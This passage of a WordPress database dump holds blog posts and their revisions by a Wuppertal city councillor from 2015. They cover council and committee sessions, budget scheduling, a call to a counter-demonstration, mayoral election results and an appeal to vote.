angenommen.\r\n','Gebäudemanagement vom 20.08.2015','','inherit','open','open','','289-revision-v1','','','2015-08-20 17:38:41','2015-08-20 15:38:41','',289,'http://www.ollital.de/wordpress/index.php/2015/08/289-revision-v1/',0,'revision','',0),(291,2,'2015-08-20 17:38:50','2015-08-20 15:38:50','Der erste Betriebsauschuss, an dem ich heute teilnahm tagte im Preseraum im Stadion am Zoo.Die Tagesordnung war relativ unspektakulär und es gab in allen Punkten Einstimmigkeit.\r\n\r\nDas Gebäudemanagement ist jetzt beauftragt, die Benennung der Nordtribüne des Stadions in \"Horst-Szymaniak-Tribüne\" durchzuführen.\r\nDer Standort des Noteinsatzfahrzeugs 2 wird von der Heusnerstr. 40 (ehem. Klinikum Barmen) zur Feuerwache Waldeckstr. 14 verlegt.\r\nIn Ronsdorf wird das Gebäude auf dem leerstehenden Klinkgelände Staubenthaler Str. 39 zur Kindertagestagesstätte umgebaut.\r\nDie Sanierung des Wilhelm-Dörpfeld-Gymnasium wurde formal beschlossen. Der Umzug zur Hardt wurde bereits durchgeführt und wird (lt. mündl. Bericht) gut von allen Betroffenen angenommen.\r\n','Gebäudemanagement vom 20.08.2015','','inherit','open','open','','289-revision-v1','','','2015-08-20 17:38:50','2015-08-20 15:38:50','',289,'http://www.ollital.de/wordpress/index.php/2015/08/289-revision-v1/',0,'revision','',0),(292,2,'2015-08-20 22:34:09','2015-08-20 20:34:09','Der erste Betriebsauschuss, an dem ich heute teilnahm tagte im Presseraum im Stadion am Zoo.Die Tagesordnung war relativ unspektakulär und es gab in allen Punkten Einstimmigkeit.\r\n\r\nDas Gebäudemanagement ist jetzt beauftragt, die Benennung der Nordtribüne des Stadions in \"Horst-Szymaniak-Tribüne\" durchzuführen.\r\nDer Standort des Noteinsatzfahrzeugs 2 wird von der Heusnerstr. 40 (ehem. Klinikum Barmen) zur Feuerwache Waldeckstr. 14 verlegt.\r\nIn Ronsdorf wird das Gebäude auf dem leerstehenden Klinkgelände Staubenthaler Str. 39 zur Kindertagestagesstätte umgebaut.\r\nDie Sanierung des Wilhelm-Dörpfeld-Gymnasium wurde formal beschlossen. Der Umzug zur Hardt wurde bereits durchgeführt und wird (lt. mündl. Bericht) gut von allen Betroffenen angenommen.\r\n','Gebäudemanagement vom 20.08.2015','','inherit','open','open','','289-revision-v1','','','2015-08-20 22:34:09','2015-08-20 20:34:09','',289,'http://www.ollital.de/wordpress/index.php/2015/08/289-revision-v1/',0,'revision','',0),(294,2,'2015-08-31 16:17:08','2015-08-31 14:17:08','Nachdem der erste Versuch, den neuen Haushaltsplan zu verabschieden, wegen der unkalkulierbaren Kosten für die Flüchtlingsunterbringung abgesagt wurde, soll in einer Ratssondersitzung am 19.10. ein neuer Anlauf unternommen werden, den Haushalt in den Rat einzubringen. Die Fraktionen haben danach Zeit, sich in die Materie einzulesen und in den Ausschüssen zu beraten. In der Ratssitzung am 14.12. soll der Haushalt schließlich verabschiedet werden.','Terminplan für den Haushalt','','publish','open','open','','terminplan-fur-den-haushalt','','','2015-08-31 16:17:08','2015-08-31 14:17:08','',0,'http://www.ollital.de/wordpress/?p=294',0,'post','',0),(295,2,'2015-08-31 16:17:08','2015-08-31 14:17:08','Nachdem der erste Versuch, den neuen Haushaltsplan zu verabschieden, wegen der unkalkulierbaren Kosten für die Flüchtlingsunterbringung abgesagt wurde, soll in einer Ratssondersitzung am 19.10. ein neuer Anlauf unternommen werden, den Haushalt in den Rat einzubringen. Die Fraktionen haben danach Zeit, sich in die Materie einzulesen und in den Ausschüssen zu beraten. In der Ratssitzung am 14.12. soll der Haushalt schließlich verabschiedet werden.','Terminplan für den Haushalt','','inherit','open','open','','294-revision-v1','','','2015-08-31 16:17:08','2015-08-31 14:17:08','',294,'http://www.ollital.de/wordpress/index.php/2015/08/294-revision-v1/',0,'revision','',0),(296,2,'2015-09-02 19:53:30','2015-09-02 17:53:30','Unter dem Titel \"Heckinghausen ist bunt - für alle Menschen\" beginnt am Samstag, 05.09.2015, ab 14:00 eine Gegendemo zur Demo von Pro Deutschland gegen den angeblichen Asylmissbrauch und die Unterbringung von Asylbewerbern im Art-Hotel in der Bockmühle. Um ein Zeichen gegen die fremdenfeindliche Hetze zu setzen, ziehen wir vom Stadtteiltreff Heckinghauser Str. 195 zum Art-Hotel. Auch du bist eingeladen, deine Stimme gegen die Rechtspopulisten zu erheben.','Aufruf zur Gegendemo','','publish','open','open','','aufruf-zur-gegendemo','','','2015-09-03 22:54:46','2015-09-03 20:54:46','',0,'http://www.ollital.de/wordpress/?p=296',0,'post','',0),(297,2,'2015-09-02 19:47:28','2015-09-02 17:47:28','Unter dem Titel \"Heckinghausen ist bunt\" beginnt am Samstag, 05.09.2015, ab 14:00 eine Gegendemo zur Demo von Pro Deutschland gegen den angeblichen Asylmissbrauch und die Unterbringung von Asylbewerbern im Art-Hotel in der Bockmühle. ','Aufruf zur Gegendemo','','inherit','open','open','','296-revision-v1','','','2015-09-02 19:47:28','2015-09-02 17:47:28','',296,'http://www.ollital.de/wordpress/index.php/2015/09/296-revision-v1/',0,'revision','',0),(298,2,'2015-09-02 19:53:30','2015-09-02 17:53:30','Unter dem Titel \"Heckinghausen ist bunt - für alle Menschen\" beginnt am Samstag, 05.09.2015, ab 14:00 eine Gegendemo zur Demo von Pro Deutschland gegen den angeblichen Asylmissbrauch und die Unterbringung von Asylbewerbern im Art-Hotel in der Bockmühle. Um ein Zeichen gegen die fremdenfeindliche Hetze zu setzen, ziehen wir vom Treffpunkt Mohrenstr. / Waldeckstr. Zum Art-Hotel. Auch du bist eingeladen, deine Stimme gegen die Rechtspopulisten zu erheben.','Aufruf zur Gegendemo','','inherit','open','open','','296-revision-v1','','','2015-09-02 19:53:30','2015-09-02 17:53:30','',296,'http://www.ollital.de/wordpress/index.php/2015/09/296-revision-v1/',0,'revision','',0),(299,2,'2015-09-02 19:58:37','2015-09-02 17:58:37','Unter dem Titel \"Heckinghausen ist bunt - für alle Menschen\" beginnt am Samstag, 05.09.2015, ab 14:00 eine Gegendemo zur Demo von Pro Deutschland gegen den angeblichen Asylmissbrauch und die Unterbringung von Asylbewerbern im Art-Hotel in der Bockmühle. Um ein Zeichen gegen die fremdenfeindliche Hetze zu setzen, ziehen wir vom Treffpunkt stadtteiltreff Heckinghausen Zum Art-Hotel. Auch du bist eingeladen, deine Stimme gegen die Rechtspopulisten zu erheben.','Aufruf zur Gegendemo','','inherit','open','open','','296-revision-v1','','','2015-09-02 19:58:37','2015-09-02 17:58:37','',296,'http://www.ollital.de/wordpress/index.php/2015/09/296-revision-v1/',0,'revision','',0),(300,2,'2015-09-02 20:01:17','2015-09-02 18:01:17','Unter dem Titel \"Heckinghausen ist bunt - für alle Menschen\" beginnt am Samstag, 05.09.2015, ab 14:00 eine Gegendemo zur Demo von Pro Deutschland gegen den angeblichen Asylmissbrauch und die Unterbringung von Asylbewerbern im Art-Hotel in der Bockmühle. Um ein Zeichen gegen die fremdenfeindliche Hetze zu setzen, ziehen wir vom Treffpunkt Stadtteiltreff Heckinghausen Zum Art-Hotel. Auch du bist eingeladen, deine Stimme gegen die Rechtspopulisten zu erheben.','Aufruf zur Gegendemo','','inherit','open','open','','296-revision-v1','','','2015-09-02 20:01:17','2015-09-02 18:01:17','',296,'http://www.ollital.de/wordpress/index.php/2015/09/296-revision-v1/',0,'revision','',0),(301,2,'2015-09-03 16:51:33','2015-09-03 14:51:33','Unter dem Titel \"Heckinghausen ist bunt - für alle Menschen\" beginnt am Samstag, 05.09.2015, ab 14:00 eine Gegendemo zur Demo von Pro Deutschland gegen den angeblichen Asylmissbrauch und die Unterbringung von Asylbewerbern im Art-Hotel in der Bockmühle. Um ein Zeichen gegen die fremdenfeindliche Hetze zu setzen, ziehen wir von der Mohrenstr. / Ecke Waldeckstr. zum Art-Hotel. Auch du bist eingeladen, deine Stimme gegen die Rechtspopulisten zu erheben.','Aufruf zur Gegendemo','','inherit','open','open','','296-revision-v1','','','2015-09-03 16:51:33','2015-09-03 14:51:33','',296,'http://www.ollital.de/wordpress/index.php/2015/09/296-revision-v1/',0,'revision','',0),(302,2,'2015-09-03 22:54:46','2015-09-03 20:54:46','Unter dem Titel \"Heckinghausen ist bunt - für alle Menschen\" beginnt am Samstag, 05.09.2015, ab 14:00 eine Gegendemo zur Demo von Pro Deutschland gegen den angeblichen Asylmissbrauch und die Unterbringung von Asylbewerbern im Art-Hotel in der Bockmühle. Um ein Zeichen gegen die fremdenfeindliche Hetze zu setzen, ziehen wir vom Stadtteiltreff Heckinghauser Str. 195 zum Art-Hotel. Auch du bist eingeladen, deine Stimme gegen die Rechtspopulisten zu erheben.','Aufruf zur Gegendemo','','inherit','open','open','','296-revision-v1','','','2015-09-03 22:54:46','2015-09-03 20:54:46','',296,'http://www.ollital.de/wordpress/index.php/2015/09/296-revision-v1/',0,'revision','',0),(303,2,'2015-09-07 21:48:10','2015-09-07 19:48:10','Die letzte Sitzung vor der OB-Wahl war von viel Wahlkampfgetöse geprägt und daher entsprechend lang.\r\n\r\nDer Einwohnerantrag zu den Geldern, die durch den KiTa-Streik eingespart wurden, wurde abgelehnt. Statt in die Sanierung und Ausstattung der KiTas, fliessen die 2 Mio EUR jetzt in die Haushaltsanierung. Jeder hatte eine andere Rechtsauffassung, wie das Geld verwendet werden darf.\r\nFür den Haushalt 2016/2017 wird es keine Bürgerbeteiligung geben, da das nach Ansicht der SPD zeitlich nicht funktionieren würde. Der Haushalt soll am 14.12. verabschiedet werden, rechtlich müsste das am 30.11. passieren.\r\nBeim Redebeitrag der Fraktion Pro Deutschland/REP wurde so stark verbal über die Stränge geschlagen, dass der OB zur Ordnung rief. Nachdem von den Anhängern der Fraktion Missfallensäusserungen aufkamen, hat der Oberbürgermeister diese des Saales verwiesen, worauf die Stadtverordneten der Fraktion ausfallend wurden.\r\nDer Freifunkantrag, zu dem ich im März in der Fraktionssitzung den Anstoss gegeben habe, wurde einstimmig angenommen. Das freut mich persönlich sehr.\r\n\r\n','Ratssitzung vom 07.09.2015','','publish','open','open','','ratssitzung-vom-07-09-2015','','','2015-09-08 22:27:07','2015-09-08 20:27:07','',0,'http://www.ollital.de/wordpress/?p=303',0,'post','',0),(304,2,'2015-09-07 21:48:10','2015-09-07 19:48:10','Die letzte Stzung vor der OB-Wahl war von viel Wahlkampfgetöse geprägt und daher entsprechend lang.\r\n\r\nDer Einwohnerantrag zu den Geldern, die durch den KiTa-Streik eingespart wurden, wurde abgelehnt. Statt in die Sanierung und Ausstattung der KiTas, fliessen die 2 Mio EUR jetzt in die Haushaltsanierung. Jeder hatte eine andere Rechtsauffassung, wie das Geld verwendet werden darf.\r\nFür den Haushalt 2016/2017 wird es keine Bürgerbeteiligung geben, da das nach Ansicht der SPD zeitlich nicht funktionieren würde. Der Haushalt soll am 14.12. verabschiedet werden, rechtlich müsste das am 30.11. passieren.\r\nBeim Redebeitrag der Fraktion Pro Deutschland/REP wurde so stark verbal über die Stränge geschlagen, dass der OB zur Ordnung rief. Nachdem von den Anhängern der Fraktion Missfallensäusserungen aufkamen, hat der Oberbürgermeister diese des Saales verwiesen, worauf die Stadtverordneten der Fraktion ausfallend wurden.\r\nDer Freifunkantrag, zu dem ich im März in der Fraktionssitzung den Anstoss gegeben habe, wurde einstimmig angenommen. Das freut mich persönlich sehr.\r\n\r\n','Ratssitzung vom 07.09.2015','','inherit','open','open','','303-revision-v1','','','2015-09-07 21:48:10','2015-09-07 19:48:10','',303,'http://www.ollital.de/wordpress/index.php/2015/09/303-revision-v1/',0,'revision','',0),(305,2,'2015-09-08 22:27:07','2015-09-08 20:27:07','Die letzte Sitzung vor der OB-Wahl war von viel Wahlkampfgetöse geprägt und daher entsprechend lang.\r\n\r\nDer Einwohnerantrag zu den Geldern, die durch den KiTa-Streik eingespart wurden, wurde abgelehnt. Statt in die Sanierung und Ausstattung der KiTas, fliessen die 2 Mio EUR jetzt in die Haushaltsanierung. Jeder hatte eine andere Rechtsauffassung, wie das Geld verwendet werden darf.\r\nFür den Haushalt 2016/2017 wird es keine Bürgerbeteiligung geben, da das nach Ansicht der SPD zeitlich nicht funktionieren würde. Der Haushalt soll am 14.12. verabschiedet werden, rechtlich müsste das am 30.11. passieren.\r\nBeim Redebeitrag der Fraktion Pro Deutschland/REP wurde so stark verbal über die Stränge geschlagen, dass der OB zur Ordnung rief. Nachdem von den Anhängern der Fraktion Missfallensäusserungen aufkamen, hat der Oberbürgermeister diese des Saales verwiesen, worauf die Stadtverordneten der Fraktion ausfallend wurden.\r\nDer Freifunkantrag, zu dem ich im März in der Fraktionssitzung den Anstoss gegeben habe, wurde einstimmig angenommen. Das freut mich persönlich sehr.\r\n\r\n','Ratssitzung vom 07.09.2015','','inherit','open','open','','303-revision-v1','','','2015-09-08 22:27:07','2015-09-08 20:27:07','',303,'http://www.ollital.de/wordpress/index.php/2015/09/303-revision-v1/',0,'revision','',0),(309,2,'2015-09-13 21:56:47','2015-09-13 19:56:47','Das vorläufige antliche Endergebnis der heutigen Oberbürgermeisterwahl lautet\r\n\r\nJung 37,51%\r\nMucke 35,58 %\r\nSchulz 12,40 %\r\nBöth 6,66 %\r\nPetersen 2,66 %\r\nStranzenbach 2,94 %\r\nWerner 2,25 %\r\n\r\n(Zahlen von hier)\r\nDamit kommt es am 27.09.2015 zu einer Stichwahl zwischen Mucke und Jung.\r\n\r\nBei einer Wahlbeteiligung von 36,7% kann man leider kaum noch von einem demokratischen Prozess sprechen und ich kann jeden nur beschwören, in zwei Wochen seine Stimme abzugeben.\r\n','Stichwahl in Wuppertal','','publish','open','open','','stichwahl-in-wuppertal','','','2015-09-14 08:00:18','2015-09-14 06:00:18','',0,'http://www.ollital.de/wordpress/?p=309',0,'post','',0),(310,2,'2015-09-13 21:53:25','2015-09-13 19:53:25','Das vorläufige antliche Endergebnis der heutigen Oberbürgermeisterwahl lautet\r\n\r\nJung 37,51%\r\nMcke 35,58 %\r\nSchulz 12,40 %\r\nBöth 6,66 %\r\nPetersen 2,66 %\r\nStranzenbach 2,94 %\r\nWerner 2,25 %','Stichwahl in Wuppertal','','inherit','open','open','','309-revision-v1','','','2015-09-13 21:53:25','2015-09-13 19:53:25','',309,'http://www.ollital.de/wordpress/index.php/2015/09/309-revision-v1/',0,'revision','',0),(311,2,'2015-09-13 21:56:33','2015-09-13 19:56:33','Das vorläufige antliche Endergebnis der heutigen Oberbürgermeisterwahl lautet\r\n\r\nJung 37,51%\r\nMcke 35,58 %\r\nSchulz 12,40 %\r\nBöth 6,66 %\r\nPetersen 2,66 %\r\nStranzenbach 2,94 %\r\nWerner 2,25 %\r\n\r\n(Zahlen von hier)\r\nDamit kommt es am 27.09.2015 zu einer Stichwahl zwischen Mucke und Jung.\r\n\r\nBei einer Wahlbeteiligung von 36,7% kann man leider kaum noch von einem demokratischen Prozess sprechen und ich kann jeden nur beschwören, in zwei Wochen seine Stimme abzugeben.\r\n','Stichwahl in Wuppertal','','inherit','open','open','','309-revision-v1','','','2015-09-13 21:56:33','2015-09-13 19:56:33','',309,'http://www.ollital.de/wordpress/index.php/2015/09/309-revision-v1/',0,'revision','',0),(312,2,'2015-09-13 21:56:56','2015-09-13 19:56:56','Das vorläufige antliche Endergebnis der heutigen Oberbürgermeisterwahl lautet\r\n\r\nJung 37,51%\r\nMucke 35,58 %\r\nSchulz 12,40 %\r\nBöth 6,66 %\r\nPetersen 2,66 %\r\nStranzenbach 2,94 %\r\nWerner 2,25 %\r\n\r\n(Zahlen von hier)\r\nDamit kommt es am 27.09.2015 zu einer Stichwahl zwischen Mucke und Jung.\r\n\r\nBei einer Wahlbeteiligung von 36,7% kann man leider kaum noch von einem demokratischen Prozess sprechen und ich kann jeden nur beschwören, in zwei Wochen seine Stimme abzugeben.\r\n','Stichwahl in Wuppertal','','inherit','open','open','','309-revision-v1','','','2015-09-13 21:56:56','2015-09-13 19:56:56','',309,'http://www.ollital.de/wordpress/index.php/2015/09/309-revision-v1/',0,'revision','',0),(313,2,'2015-09-15 08:58:25','2015-09-15 06:58:25','Die Wahlbeteiligung bei der OB-Wahl am Sonntag war alarmierend gering, wenn dieser Trend anhält, entscheidet bald nur noch eine kleine Menge von Menschen über die Führungsspitze unserer Stadt. Zeit also, mal mit ein paar Wahlmythen aufzuräumen, die ich in den letzten Jahren, in Gesprächen während des Wahlkampfs zu hören bekam:\r\n\r\n1. Meine Stimme zählt sowieso nicht.\r\n\r\nVöllig falsch. Jede gültige Stimme wird nach Schliessung der Wahllokale mitgezählt. Gerade bei der Stichwahl am 27.09. kann eine einzige Stimme über den neuen OB entscheiden, da es kein Quorum gibt.\r\n\r\n2. Ich bin mit keinem Kandidaten zufrieden, also mache ich meinen Wahlschein ungültig.\r\n\r\nDas bringt gar nichts, da nur die gültigen Stimmen in die Grundgesamtheit einfliessen. Ein ungültiger Wahlschein ist genauso , als wärst du nicht zur Wahl gegangen.\r\n\r\n3. Ich habe am Wahlsonntag schon was anderes geplant.\r\n\r\nDann solltest du dich rechtzeitig um Briefwahlunterlagen bemühen oder im Rathaus Direktwahl machen.\r\n\r\n4. Die da oben machen eh, was sie wollen.\r\n\r\nGerade, wenn du unzufrieden mit der Politik bist, solltest du aktiv daran mitwirken, diese zu ändern.\r\n\r\n5. Das Wetter ist mir zu schlecht\r\n\r\nWer in Wuppertal wohnt, sollte Regenwetter kennen und wissen, wie man sich dagegen wappnet.\r\n\r\n6. Die Wahl passt nicht in meinen Zeitplan.\r\n\r\nDie Wahllokale haben 10 Stunden durchgängig geöffnet, da solltest eigentlich auch du passenden Zeitpunkt finden.\r\n\r\n7. Wahlen ändern eh nichts\r\n\r\nGegenfrage: Was ändert sich denn, wenn du nicht wählst?\r\n\r\n8. Ich habe meine Wahlbenachrichtigung nicht mehr\r\n\r\nDas ist kein Problem, geh einfach mit einem amtlichen Lichtbildausweis in dein Wahllokal.\r\n\r\n\r\nZur Erinnerung: 1989 haben Millionen von Deutsche protestiert, um freie demokratische Wahlen zu bekommen. Heute sind Tausende auf der Flucht vor repressiven\r\nRegierungen.\r\nAm 12.09. habe ich Jugendliche kennengelernt, die gerne am demokratischen Prozess teilnehmen möchten.\r\n\r\nNiemand sollte sein Wahlrecht leichtfertig weggeben!\r\nDaher rufe ich jeden Wuppertaler auf, am 27.09. über unseren neuen Oberbürgermeister mitzubestimmen.\r\n\r\n','Wahlmythen','','publish','open','open','','wahlmythen','','','2015-09-15 11:38:06','2015-09-15 09:38:06','',0,'http://www.ollital.de/wordpress/?p=313',0,'post','',0),(314,2,'2015-09-15 08:56:11','2015-09-15 06:56:11','Die Wahlbeteiligung bei der OB-Wahl am Sonntag war alarmierend gering, wenn dieser Trend anhält, entscheidet bald nur noch eine kleine Menge von Menschen über die Führungsspitze unserer Stadt. Zeit also, mal mit ein paar Wahlmythen aufzuräumen, die ich in den letzten Jahren, in Gesprächen während des Wahlkampfs zu hören bekam:\r\n\r\n1. Meine Stimme zählt sowieso nicht.\r\n\r\nVöllig falsch. Jede gültige Stimme wird nach Schliessung der Wahllokale mitgezählt. Gerade bei der Stichwahl am 27.09. kann eine einzige Stimme über den neuen OB entscheiden, da es kein Quorum gibt.\r\n\r\n2. Ich bin mit keinem Kandidaten zufrieden, also mache ich meinen Wahlschein ungültig.\r\n\r\nDas bringt gar nichts, da nur die gültigen Stimmen in die Grundgesamtheit einfliessen. Ein ungültiger Wahlschein ist genauso , als wärst du nicht zur Wahl gegangen.\r\n\r\n3. Ich habe am Wahlsonntag schon was anderes geplant.\r\n\r\nDann solltest du dich rechtzeitig um Briefwahlunterlagen bemühen oder im Rathaus Direktwahl machen.\r\n\r\n4. Die da oben machen eh, was sie wollen.\r\n\r\nGerade, wenn du unzufrieden mit der Politik bist, solltest du aktiv daran mitwirken, diese zu ändern.\r\n\r\n5. Das Wetter ist mir zu schlecht\r\n\r\nWer in Wuppertal wohnt, sollte Regenwetter kennen und wissen, wie man sich dagegen wappnet.\r\n\r\n6. Die Wahl passt nicht in meinen Zeitplan.\r\n\r\nDie Wahllokale haben 10 Stunden durchgängig geöffnet, da sollte eigentlich auch du passenden Zeitpunkt finden.\r\n\r\n7. Wahlen ändern eh nichts\r\n\r\nGegenfrage: Was ändert sich denn, wenn du nicht wählst?\r\n\r\n8. Ich habe meine Wahlbenachrichtigung nicht mehr\r\n\r\nDas ist kein Problem, geh einfach mit einem amtlichen Lichtbildausweis in dein Wahllokal.\r\n\r\n\r\nZur Erinnerung: 1989 haben Millionen von Deutsche protestiert, um freie demokratische Wahlen zu bekommen. Heute sind Tausende auf der Flucht vor repressiven\r\nRegierungen.\r\nAm 12.09. habe ich Jugendliche kennengelernt, die gerne am demokratischen Prozess teilnehmen möchten.\r\n\r\nNiemand sollte sein Wahlrecht leichtfertig weggeben!\r\nDaher rufe ich jeden Wuppertaler auf, am 27.09. über unseren neuen Oberbürgermeister mitzubestimmen.\r\n\r\n','Wahlmythen','','inherit','open','open','','313-revision-v1','','','2015-09-15 08:56:11','2015-09-15 06:56:11','',313,'http://www.ollital.de/wordpress/index.php/2015/09/313-revision-v1/',0,'revision','',0),(315,2,'2015-09-15 11:38:06','2015-09-15 09:38:06','Die Wahlbeteiligung bei der OB-Wahl am Sonntag war alarmierend gering, wenn dieser Trend anhält, entscheidet bald nur noch eine kleine Menge von Menschen über die Führungsspitze unserer Stadt. Zeit also, mal mit ein paar Wahlmythen aufzuräumen, die ich in den letzten Jahren, in Gesprächen während des Wahlkampfs zu hören bekam:\r\n\r\n1. Meine Stimme zählt sowieso nicht.\r\n\r\nVöllig falsch. Jede gültige Stimme wird nach Schliessung der Wahllokale mitgezählt. Gerade bei der Stichwahl am 27.09. kann eine einzige Stimme über den neuen OB entscheiden, da es kein Quorum gibt.\r\n\r\n2. Ich bin mit keinem Kandidaten zufrieden, also mache ich meinen Wahlschein ungültig.\r\n\r\nDas bringt gar nichts, da nur die gültigen Stimmen in die Grundgesamtheit einfliessen. Ein ungültiger Wahlschein ist genauso , als wärst du nicht zur Wahl gegangen.\r\n\r\n3. Ich habe am Wahlsonntag schon was anderes geplant.\r\n\r\nDann solltest du dich rechtzeitig um Briefwahlunterlagen bemühen oder im Rathaus Direktwahl machen.\r\n\r\n4. Die da oben machen eh, was sie wollen.\r\n\r\nGerade, wenn du unzufrieden mit der Politik bist, solltest du aktiv daran mitwirken, diese zu ändern.\r\n\r\n5. Das Wetter ist mir zu schlecht\r\n\r\nWer in Wuppertal wohnt, sollte Regenwetter kennen und wissen, wie man sich dagegen wappnet.\r\n\r\n6. Die Wahl passt nicht in meinen Zeitplan.\r\n\r\nDie Wahllokale haben 10 Stunden durchgängig geöffnet, da solltest eigentlich auch du passenden Zeitpunkt finden.\r\n\r\n7. Wahlen ändern eh nichts\r\n\r\nGegenfrage: Was ändert sich denn, wenn du nicht wählst?\r\n\r\n8. Ich habe meine Wahlbenachrichtigung nicht mehr\r\n\r\nDas ist kein Problem, geh einfach mit einem amtlichen Lichtbildausweis in dein Wahllokal.\r\n\r\n\r\nZur Erinnerung: 1989 haben Millionen von Deutsche protestiert, um freie demokratische Wahlen zu bekommen. Heute sind Tausende auf der Flucht vor repressiven\r\nRegierungen.\r\nAm 12.09. habe ich Jugendliche kennengelernt, die gerne am demokratischen Prozess teilnehmen möchten.\r\n\r\nNiemand sollte sein Wahlrecht leichtfertig weggeben!\r\nDaher rufe ich jeden Wuppertaler auf, am 27.09. über unseren neuen Oberbürgermeister mitzubestimmen.\r\n\r\n','Wahlmythen','','inherit','open','open','','313-revision-v1','','','2015-09-15 11:38:06','2015-09-15 09:38:06','',313,'http://www.ollital.de/wordpress/index.php/2015/09/313-revision-v1/',0,'revision','',0),(316,2,'2015-09-17 14:28:10','2015-09-17 12:28:10','Olli Graf, Wuppertaler gebürtig und aus Überzeugung.\r\nJahrgang 1969\r\nDipl. Inform. (FH)\r\nPirat\r\nStadtverordneter im Rat der Stadt Wuppertal #talrat\r\nAuschuss für Stadtentwicklung, Wirtschaft und Bauen\r\nBetriebsauschuss Gebäudemanagement Wuppertal\r\nMitglied in der Fraktion BÜNDNIS 90 / Die Grünen im Stadtrat\r\n\r\nStadtverordneter Olli Graf\r\nJohannes-Rau-Platz 1\r\n42275 Wuppertal\r\nollirat@ollital.de\r\n','Über mich','','inherit','open','open','','74-revision-v1','','','2015-09-17 14:28:10','2015-09-17 12:28:10','',74,'http://www.ollital.de/wordpress/index.php/2015/09/74-revision-v1/',0,'revision','',0),(318,2,'2015-09-25 11:35:15','2015-09-25 09:35:15','Durch eine geänderte Stichtagsregelung erhält Wuppertal vom Land rund 25 Mio EUR für die Unterbringung und Versorgung von Flüchtlingen pauschal für 2016. Dies sind 17 Mio EUR mehr als die bisherigen 8,5 Mio EUR und sorgen dafür, dass der Kämmerer am 19.10. einen genehmigungsfähigen Haushalt einbringen kann.\r\nAuch die von der Bundesregierung beschlossenen 670,- EUR pro Asylbewerber ab dem Zeitpunk der Registrierung dürfte zur Entlastung des kommunalen Haushalts beitragen.\r\n','17 Mio Euro mehr für Wuppertal','','publish','open','open','','17-mio-euro-mehr-fur-wuppertal','','','2015-09-25 11:35:15','2015-09-25 09:35:15','',0,'http://www.ollital.de/wordpress/?p=318',0,'post','',0),(319,2,'2015-09-25 11:35:15','2015-09-25 09:35:15','Durch eine geänderte Stichtagsregelung erhält Wuppertal vom Land rund 25 Mio EUR für die Unterbringung und Versorgung von Flüchtlingen pauschal für 2016. Dies sind 17 Mio EUR mehr als die bisherigen 8,5 Mio EUR und sorgen dafür, dass der Kämmerer am 19.10. einen genehmigungsfähigen Haushalt einbringen kann.\r\nAuch die von der Bundesregierung beschlossenen 670,- EUR pro Asylbewerber ab dem Zeitpunk der Registrierung dürfte zur Entlastung des kommunalen Haushalts beitragen.\r\n','17 Mio Euro mehr für Wuppertal','','inherit','open','open','','318-revision-v1','','','2015-09-25 11:35:15','2015-09-25 09:35:15','',318,'http://www.ollital.de/wordpress/index.php/2015/09/318-revision-v1/',0,'revision','',0),(321,2,'2015-09-27 21:38:27','2015-09-27 19:38:27','So hat Wuppertal in der Stichwahl entschieden:\r\n\r\n59,70% Mucke\r\n40,30% Jung.\r\nWahlbeteiligung: 33,52% \r\nHerzlichen Glückwunsch an Andreas Mucke und viel Erfolg.\r\n\r\nDie Wahlbeteiligung ist leider im Vergleich zur Hauptwahl nochmal zurückgegangen, ein Trend, der dringendst umgekehrt werden muß.\r\n','ein neuer OB für Wuppertal','','publish','open','open','','ein-neuer-ob-fur-wuppertal','','','2015-09-27 21:38:27','2015-09-27 19:38:27','',0,'http://www.ollital.de/wordpress/?p=321',0,'post','',0),(322,2,'2015-09-27 21:38:27','2015-09-27 19:38:27','So hat Wuppertal in der Stichwahl entschieden:\r\n\r\n59,70% Mucke\r\n40,30% Jung.\r\nWahlbeteiligung: 33,52% \r\nHerzlichen Glückwunsch an Andreas Mucke und viel Erfolg.\r\n\r\nDie Wahlbeteiligung ist leider im Vergleich zur Hauptwahl nochmal zurückgegangen, ein Trend, der dringendst umgekehrt werden muß.\r\n','ein neuer OB für Wuppertal','','inherit','open','open','','321-revision-v1','','','2015-09-27 21:38:27','2015-09-27 19:38:27','',321,'http://www.ollital.de/wordpress/index.php/2015/09/321-revision-v1/',0,'revision','',0),(324,2,'2015-10-22 07:26:03','2015-10-22 05:26:03','Etwa drei Wochen nach der Stichwahl hat Andreas Mucke am 21.10.2015 das Oberbürgermeisteramt von Peter Jung übernommen.\r\nIch bin gespannt auf die Zusammenarbeit und wünsche dem neuen OB viel Erfolg für seine Arbeit und viele gute Entscheidungen für die Wuppertaler Bürger.\r\nPeter Jung danke ich für seinen Einsatz in den letzten Jahren und wünsche ihm alles Gute für die Zukunft.\r\n','Amtsantritt','','publish','open','open','','amtsantritt','','','2015-10-22 07:26:03','2015-10-22 05:26:03','',0,'http://www.ollital.de/wordpress/?p=324',0,'post','',0),(325,2,'2015-10-22 07:26:03','2015-10-22 05:26:03','Etwa drei Wochen nach der Stichwahl hat Andreas Mucke am 21.10.2015 das Oberbürgermeisteramt von Peter Jung übernommen.\r\nIch bin gespannt auf die Zusammenarbeit und wünsche dem neuen OB viel Erfolg für seine Arbeit und viele gute Entscheidungen für die Wuppertaler Bürger.\r\nPeter Jung danke ich für seinen Einsatz in den letzten Jahren und wünsche ihm alles Gute für die Zukunft.\r\n','Amtsantritt','','inherit','open','open','','324-revision-v1','','','2015-10-22 07:26:03','2015-10-22 05:26:03','',324,'http://www.ollital.de/wordpress/index.php/2015/10/324-revision-v1/',0,'revision','',0),(326,2,'2015-10-23 13:43:46','2015-10-23 11:43:46','Am nächsten Dienstag, 27.10.2015, wird der Doppelhaushalt 2016/2017 in einer Sondersitzung in den Rat eingebracht. Bis zum 09.12. wird dieser dann in den Auschüssen und Fraktionen beraten, um am 14.12.2015 verabschiedet zu werden.\r\nAb Mittwoch, den 28.10.2015, können die Wuppertaler Bürger über den Haushaltsentwurf und die Fortschreibung des Haushaltsanierungsplan zu informieren und sich zu beteiligen.\r\nDazu findet am Mittwoch, den 28.10.2015, um 19:30 Uhr im Haus der Jugend eine erste Informationsveranstaltung statt, in der Dr. Slawig das Zahlenwerk erläutert.\r\nBis zum 20.11. können sich Bürger und Bürgerinnen online und auf verschiedenen Veranstaltungen an den Beratungen beteiligen.\r\n\r\nQuelle: Stadt Wuppertal','Haushaltberatungen','','publish','open','open','','haushaltberatungen','','','2015-10-23 13:43:46','2015-10-23 11:43:46','',0,'http://www.ollital.de/wordpress/?p=326',0,'post','',0),(327,2,'2015-10-23 13:43:46','2015-10-23 11:43:46','Am nächsten Dienstag, 27.10.2015, wird der Doppelhaushalt 2016/2017 in einer Sondersitzung in den Rat eingebracht. Bis zum 09.12. wird dieser dann in den Auschüssen und Fraktionen beraten, um am 